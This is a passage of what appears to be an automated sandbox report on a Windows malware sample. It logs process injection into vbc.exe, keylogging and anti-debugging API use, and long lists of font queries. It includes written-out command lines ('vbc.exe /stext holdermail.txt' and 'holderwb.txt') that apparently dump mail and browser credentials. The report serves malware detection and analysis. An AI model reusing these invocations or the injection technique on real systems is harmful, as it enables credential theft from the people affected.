                Source: bhv8D09.tmp.13.drBinary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:D9BC7EDF-91E8-C8ED-3ED4-3B144B30C00C&ctry=US&time=20220308T094317Z&lc=en-US&pl=en-US&idtp=mid&uid=a9223225-82ba-4622-a95e-dcecd6738abd&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=0217a865f8f848fda01c81f53625784e&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1417890&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=1417890&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information queried: ProcessInformation
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_004161B0 memset,GetSystemInfo,
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeCode function: 1_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeCode function: 1_2_00405C22 FindFirstFileA,FindClose,
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeCode function: 1_2_00402630 FindFirstFileA,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_00404A29 FindFirstFileExW,
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 12_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeCode function: 1_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_004035F1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 3_2_0040F983 _memset,IsDebuggerPresent,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 3_2_00410AFA EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 3_2_0040E588 GetProcessHeap,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeMemory allocated: page read and write | page guard
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 3_2_0040F55D SetUnhandledExceptionFilter,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 3_2_0040F58E SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_00401E1D SetUnhandledExceptionFilter,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
                Source: 5.2.pjavpo.exe.4a20000.16.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 5.2.pjavpo.exe.4a20000.16.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess created: C:\Users\user\AppData\Local\Temp\pjavpo.exe C:\Users\user\AppData\Local\Temp\pjavpo.exe C:\Users\user\AppData\Local\Temp\brtwja
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt"
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
